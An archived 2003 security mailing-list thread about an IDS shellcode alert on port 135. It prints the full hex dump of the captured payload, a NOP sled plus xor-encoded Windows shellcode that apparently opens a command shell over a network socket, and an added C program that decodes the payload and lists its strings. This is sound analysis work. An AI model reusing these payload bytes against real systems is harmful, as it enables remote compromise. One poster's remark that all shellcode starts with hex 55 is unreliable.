[Dshield] shellcode detect on port 135

DAN MORRILL dan_20407 at msn.com
Thu Aug 21 14:09:55 GMT 2003


That is one of the fun things about working with IDS systems, and the reason 
for posting to this body is to get answers to things that show up.

If it is simply padding great, no problems there. If it is something new, no 
reason to cry wolf, just wanting to share data that I personally have not 
seen before, and to get the opinion of a larger body of people.

I do appreciate your opinion, and all I have is the data that I have. I will 
share the data willingly, and I am looking for interesting view points in 
this field.

I now know that "all" shell code starts with hex 55. I will look for that, 
and thanks for letting me know that.

Cheers/r/Dan




>From: "Mike Blomgren" <mike.blomgren at secode.com>
>Reply-To: General DShield Discussion List <list at dshield.org>
>To: <list at dshield.org>
>Subject: RE: [Dshield] shellcode detect on port 135
>Date: Thu, 21 Aug 2003 15:26:16 +0200
>
>One must be careful when crying wolf for positive triggers of Shell-Code
>detection, for this signature.
>
>In this case the signature looks for a number of NOOPs (0x90). In
>itself nothing to do with shellcode, but possibly as padding and
>commonly used in shell-code. But found many places elsewhere as well.
>
>Just as a heads-up.
>
>~Mike
>
> > -----Original Message-----
> > From: list-bounces at dshield.org
> > [mailto:list-bounces at dshield.org] On Behalf Of DAN MORRILL
> > Sent: den 21 augusti 2003 15:00
> > To: list at dshield.org
> > Subject: [Dshield] shellcode detect on port 135
> >
> >
> > New and interesting, shell code detect on port 135 around 2003-08-21
> > 02:33:54
> >
> > I have never seen shell code on port 135 before. Here is as
> > much information
> > on this as I Have, if I see any other detects, I will forward
> > if wanted.
> >
> > Good Morning!
> > r/
> > Dan
> >
> > --------------------------------------------------------------------------------
> > Meta  ID # Time Triggered Signature
> > 5 - 6051 2003-08-21 02:33:54 [arachNIDS][snort] SHELLCODE x86 NOOP
> >
> > Sensor name interface filter
> >
> >
> > IP  source addr     dest addr  Ver  Hdr Len  TOS  length  ID     flags  offset  TTL  chksum
> >     65.104.244.139  X.X.X.X    4    5        0    806     50174  0      0       111  19765
> >
> > FQDN Source Name Dest. Name
> > w139.z065104244.aus-tx.dsl.cnc.net
> >
> > Options     none
> >
> > D-Port 135
> >
> > TCP  sport  dport  flags  seq #       ack         offset  res  window  urp  chksum
> >      3946   135    X X    1569699291  2059210510  5       0    64180   0    37506
> >
> > Options     none
> >
> > Payload   length = 766
> >
> > 000 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 020 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 030 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 040 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 050 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 060 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 070 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 080 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 090 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 0a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 0b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 0c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 0d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 0e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 0f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 100 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 110 : 90 90 90 90 90 90 90 90 90 90 90 90 EB 10 5A 4A  ..............ZJ
> > 120 : 33 C9 66 B9 76 01 80 34 0A 99 E2 FA EB 05 E8 EB  3.f.v..4........
> > 130 : FF FF FF 70 61 99 99 99 C3 21 95 69 64 E6 12 99  ...pa....!.id...
> > 140 : 12 E9 85 34 12 D9 91 12 41 12 EA A5 9A 6A 12 EF  ...4....A....j..
> > 150 : E1 9A 6A 12 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8  ..j....b....t...
> > 160 : 12 A6 9A 62 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A  ...b.k...j?.....
> > 170 : 5E 9D DC 7B 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48  ^..{p....T....ZH
> > 180 : 78 9A 58 AA 50 FF 12 91 12 DF 85 9A 5A 58 78 9B  x.X.P.......ZXx.
> > 190 : 9A 58 12 99 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3  .X...Z.c.n._..I.
> > 1a0 : 9A C0 71 ED 99 99 99 1A 5F 94 CB CF 66 CE 65 C3  ..q....._...f.e.
> > 1b0 : 12 41 F3 9A C0 71 F8 99 99 99 1A 75 DD 12 6D F3  .A...q.....u..m.
> > 1c0 : 89 C0 10 9D 17 7B 62 C9 C9 C9 C9 F3 98 F3 9B 66  .....{b........f
> > 1d0 : CE 6D 12 41 10 C7 A1 10 C7 A5 10 C7 D9 FF 5E DF  .m.A..........^.
> > 1e0 : B5 98 98 14 DE 89 C9 CF AA 59 C9 C9 C9 F3 98 C9  .........Y......
> > 1f0 : C9 14 CE A5 5E 9B FA F4 FD 99 CB C9 66 CE 71 5E  ....^.......f.q^
> > 200 : 9E 9B 99 9B 5A 5E DE 9D D8 F1 6D 12 F3 89 CE CA  ....Z^....m.....
> > 210 : 66 CE 61 CA 66 CE 65 C9 66 CE 75 AA 59 35 1C 59  f.a.f.e.f.u.Y5.Y
> > 220 : EC 60 C8 CB CF CA 66 4B C3 C0 32 7B 77 AA 59 5A  .`....fK..2{w.YZ
> > 230 : 71 9A 66 66 66 DE FC ED C9 EB F6 FA D8 FD FD EB  q.fff...........
> > 240 : FC EA EA 99 DA EB FC F8 ED FC C9 EB F6 FA FC EA  ................
> > 250 : EA D8 99 DC E1 F0 ED CD F1 EB FC F8 FD 99 D5 F6  ................
> > 260 : F8 FD D5 F0 FB EB F8 EB E0 D8 99 EE EA AB C6 AA  ................
> > 270 : AB 99 CE CA D8 CA F6 FA F2 FC ED D8 99 FA F6 F7  ................
> > 280 : F7 FC FA ED 99 FA F5 F6 EA FC EA F6 FA F2 FC ED  ................
> > 290 : 99 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00  ..\.C.$.\.1.2.3.
> > 2a0 : 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00  4.5.6.1.1.1.1.1.
> > 2b0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00  1.1.1.1.1.1.1.1.
> > 2c0 : 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 01 10  1.1...d.o.c.....
> > 2d0 : 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00  ...... ...0.-...
> > 2e0 : 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C  ...*..........(.
> > 2f0 : 0C 00 01 00 00 00 07 00 00 00 00 00 00 00         ..............
> >
> >
> >
> >
> >
> >
> >
> >
> > Sometimes MSN E-mail will indicate that the message failed to be delivered.
> > Please resend when you get those; it does not mean that the mail box is bad,
> > merely that MSN mail is overworked at the time.
> >
> > Otherwise, hope things are going well.
> > r/
> > Dan
> >
> >
> > _______________________________________________
> > list mailing list
> > list at dshield.org
> > To change your subscription options (or unsubscribe), see:
> > http://www.dshield.org/mailman/listinfo/list
> >
>

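Added example, not part of the thread above: a small C program that works on the bytes Dan posted, following both points raised in the thread. It measures the run of 0x90 that fired the SHELLCODE x86 NOOP signature (Mike's point: the sled by itself proves nothing), then looks at what sits right behind the sled, where the dump shows a short jmp/call/pop sequence followed by `xor byte [edx+ecx], 0x99` in a loop: a self-locating xor decoder. The program runs that same decoder over the bytes that follow and lists the NUL-terminated printable strings that fall out. Rows 110 through 2a0 of the dump are embedded as string literals copied from the post; every row before 110 is 0x90 in the dump, so the constant BASE stands in for them instead of repeating 272 bytes of NOPs. The function names and the 3-byte minimum string length are choices made for this example, not anything the posts specify.

```c
/* Added example, not from the DShield thread: take the payload rows Dan posted
 * (rows 110..2a0 are embedded as string literals; every row before 110 is 0x90
 * in his dump, so BASE stands in for them), measure the NOP sled, read the xor
 * decoder stub that follows it, run that decoder and print the strings it
 * uncovers.  Function names and the 3-byte string threshold are this example's. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BASE 0x110          /* payload offset of the first byte in ROWS */
#define MAX_STRINGS 32
static const char *ROWS[] = {
 "90 90 90 90 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9 76 01 80 34 0A 99 E2 FA EB 05 E8 EB",
 "FF FF FF 70 61 99 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34 12 D9 91 12 41 12 EA A5 9A 6A 12 EF",
 "E1 9A 6A 12 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A",
 "5E 9D DC 7B 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA 50 FF 12 91 12 DF 85 9A 5A 58 78 9B",
 "9A 58 12 99 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 ED 99 99 99 1A 5F 94 CB CF 66 CE 65 C3",
 "12 41 F3 9A C0 71 F8 99 99 99 1A 75 DD 12 6D F3 89 C0 10 9D 17 7B 62 C9 C9 C9 C9 F3 98 F3 9B 66",
 "CE 6D 12 41 10 C7 A1 10 C7 A5 10 C7 D9 FF 5E DF B5 98 98 14 DE 89 C9 CF AA 59 C9 C9 C9 F3 98 C9",
 "C9 14 CE A5 5E 9B FA F4 FD 99 CB C9 66 CE 71 5E 9E 9B 99 9B 5A 5E DE 9D D8 F1 6D 12 F3 89 CE CA",
 "66 CE 61 CA 66 CE 65 C9 66 CE 75 AA 59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B 77 AA 59 5A",
 "71 9A 66 66 66 DE FC ED C9 EB F6 FA D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB F6 FA FC EA",
 "EA D8 99 DC E1 F0 ED CD F1 EB FC F8 FD 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99 EE EA AB C6 AA",
 "AB 99 CE CA D8 CA F6 FA F2 FC ED D8 99 FA F6 F7 F7 FC FA ED 99 FA F5 F6 EA FC EA F6 FA F2 FC ED",
 "99 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00",
};

struct decoder { size_t stub_off, start; uint16_t count; uint8_t key; };
static uint8_t buf[512];
static size_t buflen;
static struct decoder dec;                 /* filled by find_decoder() */
static char found[MAX_STRINGS][64];
static int nfound;

/* Turn the "xx xx ..." rows into bytes; returns the byte count (416 here). */
static size_t parse_rows(void) {
    buflen = 0;
    for (size_t r = 0; r < sizeof ROWS / sizeof ROWS[0]; r++) {
        const char *p = ROWS[r];
        for (;;) {
            char *end;
            unsigned long v = strtoul(p, &end, 16);
            if (end == p || buflen == sizeof buf) break;
            buf[buflen++] = (uint8_t)v;
            p = end;
        }
    }
    return buflen;
}
/* Payload offset of the first byte that is not 0x90, i.e. where the sled ends. */
static size_t sled_end(void) {
    size_t i = 0;
    while (i < buflen && buf[i] == 0x90) i++;
    return BASE + i;
}
/* Match the stub the dump shows right after the sled:
 *   EB 10            jmp short +0x10    -> to the call
 *   5A 4A            pop edx ; dec edx  (edx = first encoded byte - 1)
 *   33 C9 66 B9 lo hi  xor ecx,ecx ; mov cx, count
 *   80 34 0A key     xor byte [edx+ecx], key      E2 FA  loop (back to xor)
 *   EB 05            jmp short +5       -> into the decoded bytes
 *   E8 EB FF FF FF   call -0x15         -> pop edx gets the address after the call */
static int find_decoder(void) {
    static const uint8_t head[] = {0xEB,0x10,0x5A,0x4A,0x33,0xC9,0x66,0xB9};
    static const uint8_t tail[] = {0xE2,0xFA,0xEB,0x05,0xE8,0xEB,0xFF,0xFF,0xFF};
    for (size_t i = 0; i + 23 <= buflen; i++) {
        if (memcmp(buf + i, head, sizeof head) != 0) continue;
        if (buf[i+10] != 0x80 || buf[i+11] != 0x34 || buf[i+12] != 0x0A) continue;
        if (memcmp(buf + i + 14, tail, sizeof tail) != 0) continue;
        dec.stub_off = BASE + i;
        dec.count = (uint16_t)(buf[i+8] | (buf[i+9] << 8));
        dec.key = buf[i+13];
        dec.start = i + 23;                /* byte after the call */
        return 1;
    }
    return 0;
}
/* Do what the loop does: xor `count` bytes from `start` with `key`, bounds-checked. */
static size_t decode(void) {
    size_t n = dec.count;
    if (dec.start + n > buflen) n = buflen - dec.start;
    for (size_t i = 0; i < n; i++) buf[dec.start + i] ^= dec.key;
    return n;
}
/* Collect NUL-terminated runs of at least minlen printable bytes from the decoded area. */
static int extract_strings(size_t decoded, size_t minlen) {
    size_t run = 0, end = dec.start + decoded;
    nfound = 0;
    for (size_t i = dec.start; i < end && nfound < MAX_STRINGS; i++) {
        if (isprint(buf[i])) { run++; continue; }
        if (buf[i] == 0 && run >= minlen && run < sizeof found[0]) {
            memcpy(found[nfound], buf + i - run, run);
            found[nfound++][run] = '\0';
        }
        run = 0;
    }
    return nfound;
}
static int has_string(const char *s) {
    for (int i = 0; i < nfound; i++) if (strcmp(found[i], s) == 0) return 1;
    return 0;
}
/* Whole pipeline; returns the number of strings recovered, -1 if no stub is found. */
static int run_analysis(void) {
    parse_rows();
    if (!find_decoder()) return -1;
    return extract_strings(decode(), 3);
}
int main(void) {
    int n = run_analysis();
    printf("NOP sled ends at payload offset 0x%zx\n", sled_end());
    printf("decoder at 0x%zx: xor 0x%x over 0x%x bytes starting at 0x%zx\n",
           dec.stub_off, dec.key, dec.count, BASE + dec.start);
    for (int i = 0; i < n; i++) printf("  %s\n", found[i]);
    return n > 0 ? 0 : 1;
}
```

Build it with any C99 compiler (`cc -std=c99 -Wall decoder.c && ./a.out`). On the posted bytes it reports the sled ending at offset 0x11c, a decoder keyed with 0x99 over 0x176 bytes starting at 0x133, and decoded strings including cmd, GetProcAddress, CreateProcessA, ExitThread, LoadLibraryA, ws2_32, WSASocketA, connect and closesocket. Two things worth noting for triage: the 0x90 run is the only thing the signature saw, and it is the decoder stub plus the recovered import names, not the sled, that settle whether this is padding or code; and the decoder's count runs past the last string terminator into the UTF-16 text at 0x292, which is why `decode()` clamps to the buffer rather than trusting the count in the stub.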



